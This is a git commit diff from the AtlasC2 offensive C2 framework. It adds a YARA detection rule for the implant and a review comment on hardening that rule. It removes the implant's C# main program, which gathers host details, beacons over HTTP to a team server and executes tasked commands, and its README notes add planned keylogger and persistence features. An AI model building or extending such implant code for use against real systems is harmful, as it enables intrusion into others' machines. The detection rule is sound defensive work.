Merge branch 'master' of https://github.com/Gr1mmie/AtlasC2
commit
cce198924f
@ -0,0 +1,4 @@
|
||||||
|
# These are supported funding model platforms
|
||||||
|
|
||||||
|
github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
|
||||||
|
ko_fi: grimmie
|
|
@ -0,0 +1,61 @@
|
||||||
|
rule AtlasImplant_Yara {
|
||||||
|
meta:
|
||||||
|
last_updated = "3-20-2022"
|
||||||
|
author = "Grimmie (@Gr1mmie)"
|
||||||
|
description = "Searches for strings present in the Atlas C2 Implant"
|
||||||
|
md5 = "7bbb5fce0b18f613674fd09da14e5e45"
|
||||||
|
|
||||||
|
strings:
|
||||||
|
// system namespaces
|
||||||
|
$systemNamespace1 = "System.Net" ascii
|
||||||
|
$systemNamespace2 = "System.Text" ascii
|
||||||
|
$systemNamespace3 = "System.Linq" ascii
|
||||||
|
$systemNamespace4 = "System.Timers" ascii
|
||||||
|
$systemNamespace5 = "System.Runtime" ascii
|
||||||
|
$systemNamespace6 = "System.Reflection" ascii
|
||||||
|
$systemNamespace7 = "System.Collections" ascii
|
||||||
|
$systemNamespace8 = "System.Diagnostics" ascii
|
||||||
|
$systemNamespace9 = "System.Security" ascii
|
||||||
|
$systemNamespace10 = "System.Management.Automation" ascii
|
||||||
|
|
||||||
|
// misc stuffs
|
||||||
|
$misc1 = "ImplantDataUtils" ascii
|
||||||
|
$misc2 = "ImplantTaskUtils" ascii
|
||||||
|
$misc3 = "ImplantOptionUtils" ascii
|
||||||
|
$misc4 = "ImplantCommands" ascii
|
||||||
|
$misc5 = "ImplantTask" ascii
|
||||||
|
$misc6 = "ImplantTaskOptions" ascii
|
||||||
|
$misc7 = "ImplantOptions" ascii
|
||||||
|
$misc8 = "ImplantCommandsInit" ascii
|
||||||
|
$misc9 = "ImplantInit" ascii
|
||||||
|
$misc10 = "PollImplant" ascii
|
||||||
|
$misc11 = "ImplantTaskOut" ascii
|
||||||
|
|
||||||
|
// comms stuffs
|
||||||
|
$comms1 = "+Implant.Models.HTTPComms+<PollImplant>d__16" ascii
|
||||||
|
$comms2 = "(Implant.Models.HTTPComms+<PostData>d__18" ascii
|
||||||
|
$comms3 = "%Implant.Models.HTTPComms+<Start>d__19" ascii
|
||||||
|
|
||||||
|
// getter stuffs
|
||||||
|
$get1 = "get_assemParams" ascii
|
||||||
|
$get2 = "get_assemBytes" ascii
|
||||||
|
$get3 = "get_targetDir" ascii
|
||||||
|
$get4 = "get_procIDLen" ascii
|
||||||
|
$get5 = "get_procSessionIDLen" ascii
|
||||||
|
$get6 = "get_procNameLen" ascii
|
||||||
|
$get7 = "get_fileNameLen" ascii
|
||||||
|
$get8 = "get_dirNameLen" ascii
|
||||||
|
$get9 = "get_fileSizeLen" ascii
|
||||||
|
$get10 = "get_CurrentDomain" ascii
|
||||||
|
$get11 = "get_IsCancellationRequested" ascii
|
||||||
|
$get12 = "get_Command" ascii
|
||||||
|
$get13 = "get_assemMethod" ascii
|
||||||
|
|
||||||
|
condition:
|
||||||
|
uint16(0) == 0x5A4D and
|
||||||
|
all of $systemNamespace* and
|
||||||
|
all of $misc* and
|
||||||
|
all of $comms* and
|
||||||
|
3 of $get*
|
||||||
|
|
||||||
|
}
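Review bot: The three `$comms*` strings bind the rule to compiler-generated async state-machine names (`<PollImplant>d__16`, `<PostData>d__18`, `<Start>d__19`) whose numeric suffixes change whenever the implant source is edited and rebuilt, and the leading `+`, `(` and `%` characters appear to be the compressed-length prefix of the serialized type name, which shifts as soon as a namespace or class is renamed; with `all of $comms*` in the condition, any recompiled variant escapes the rule. Because the condition already demands `all of $misc*`, the comms strings can drop the volatile parts without loss of specificity, e.g. `$comms1 = "HTTPComms+<PollImplant>d__" ascii`, `$comms2 = "HTTPComms+<PostData>d__" ascii`, `$comms3 = "HTTPComms+<Start>d__" ascii`. The same brittleness applies to `all of $misc*`, where renaming a single one of the eleven class names defeats the rule; a threshold such as `8 of $misc*` keeps the match tight while tolerating minor refactors. The `$get*` selectors `get_CurrentDomain`, `get_IsCancellationRequested` and `get_Command` are framework-generic and contribute little to `3 of $get*`, so it may be worth weighting that clause toward the implant-specific getters. Finally, `last_updated = "3-20-2022"` would be unambiguous in ISO form (`"2022-03-20"`), and a `// md5 of the implant build the strings were extracted from` comment next to the `md5` meta would tell future maintainers which sample the rule was written against.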
|
|
@ -1,87 +0,0 @@
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Linq;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
using Implant.Models;
|
|
||||||
using Implant.Utils;
|
|
||||||
|
|
||||||
namespace Implant
|
|
||||||
{
|
|
||||||
class Program
|
|
||||||
{
|
|
||||||
private static ImplantData _implantData;
|
|
||||||
private static Comms _comms;
|
|
||||||
private static CancellationTokenSource _cancelToken;
|
|
||||||
|
|
||||||
private static List<ImplantCommands> _commands = new List<ImplantCommands>();
|
|
||||||
|
|
||||||
//put into utils
|
|
||||||
public static void GenImplantData(){
|
|
||||||
var proc = Process.GetCurrentProcess();
|
|
||||||
|
|
||||||
_implantData = new ImplantData {
|
|
||||||
// get DNS hostname
|
|
||||||
ID = ImplantDataUtils.GenImplantName(), HostName = Environment.MachineName,
|
|
||||||
User = Environment.UserName, Integrity = ImplantDataUtils.ReturnIntegrity(),
|
|
||||||
Arch = ImplantDataUtils.ReturnArch(),
|
|
||||||
ProcID = proc.Id, ProcName = proc.ProcessName,
|
|
||||||
IPAddr = ImplantDataUtils.GetHostIP()
|
|
||||||
};
|
|
||||||
|
|
||||||
proc.Dispose();
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void SendTaskOut(string _id, string _out) {
|
|
||||||
var taskOut = new ImplantTaskOut { Id = _id, TaskOut = _out };
|
|
||||||
_comms.DataSend(taskOut);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void HandleTask(ImplantTask task) {
|
|
||||||
var command = _commands.FirstOrDefault(cmd => cmd.Name.Equals(task.Command, StringComparison.InvariantCultureIgnoreCase));
|
|
||||||
if (command is null) { return; }
|
|
||||||
|
|
||||||
var _out = command.Execute(task);
|
|
||||||
SendTaskOut(task.Id, _out);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void HandleTasks(IEnumerable<ImplantTask> tasks) {
|
|
||||||
foreach (var task in tasks) { HandleTask(task); }
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void ImplantCommandsInit()
|
|
||||||
{
|
|
||||||
foreach (Type type in Assembly.GetExecutingAssembly().GetTypes())
|
|
||||||
{
|
|
||||||
if (type.IsSubclassOf(typeof(ImplantCommands)))
|
|
||||||
{
|
|
||||||
ImplantCommands cmd = Activator.CreateInstance(type) as ImplantCommands;
|
|
||||||
_commands.Add(cmd);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public void Stop() { _cancelToken.Cancel(); }
|
|
||||||
|
|
||||||
static void Main(string[] args) {
|
|
||||||
|
|
||||||
Thread.Sleep(10000);
|
|
||||||
|
|
||||||
GenImplantData();
|
|
||||||
ImplantCommandsInit();
|
|
||||||
|
|
||||||
_comms = new HTTPComms("localhost", 8080);
|
|
||||||
_comms.ImplantInit(_implantData);
|
|
||||||
_comms.Start();
|
|
||||||
|
|
||||||
_cancelToken = new CancellationTokenSource();
|
|
||||||
|
|
||||||
while (!_cancelToken.IsCancellationRequested) {
|
|
||||||
if (_comms.DataRecv(out var tasks)) { HandleTasks(tasks); }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
}
|
|
||||||
}
|
|
|
@ -1,7 +1,7 @@
|
||||||
# AtlasC2
|
# AtlasC2
|
||||||
C# C2 Framework centered around Stage 1 operations
|
C# C2 Framework centered around Stage 1 operations
|
||||||
|
|
||||||
Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all.
|
Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all. Currently targets only windows environments
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
|
|
||||||
|
@ -77,7 +77,8 @@ Open .sln and build all 3 components in Release mode
|
||||||
* Add admin utils:
|
* Add admin utils:
|
||||||
* `cp`
|
* `cp`
|
||||||
* `upload`/`download`
|
* `upload`/`download`
|
||||||
* Some barebones persistence commands (idk something like creating a user via ADSI)
|
* Keylogger (probs make standalone to load into implant)
|
||||||
|
* Some barebones persistence commands (idk something like creating a user via ADSI, WMI subscription creation. probs make these standalone assems to load into implant)
|
||||||
* Allow for the changing of the sleep timing on implant and implement jitter
|
* Allow for the changing of the sleep timing on implant and implement jitter
|
||||||
* Allow for operator to change port TeamServer starts on via CLI
|
* Allow for operator to change port TeamServer starts on via CLI
|
||||||
* Encrypted comms (yikes, ik)
|
* Encrypted comms (yikes, ik)
|
||||||
|
@ -90,8 +91,5 @@ Open .sln and build all 3 components in Release mode
|
||||||
* Shellcode generation via Donut
|
* Shellcode generation via Donut
|
||||||
* BOFs would be cool
|
* BOFs would be cool
|
||||||
|
|
||||||
|
|
||||||
### Note To Self: u forgot YARA rule. dewit
|
|
||||||
|
|
||||||
## Disclaimer
|
## Disclaimer
|
||||||
Atlas was designed soley for educational/ethical purposes. I do not condone nor am I responsible for actions taken by users of Atlas
|
Atlas was designed soley for educational/ethical purposes. I do not condone nor am I responsible for actions taken by users of Atlas
|
||||||
|
|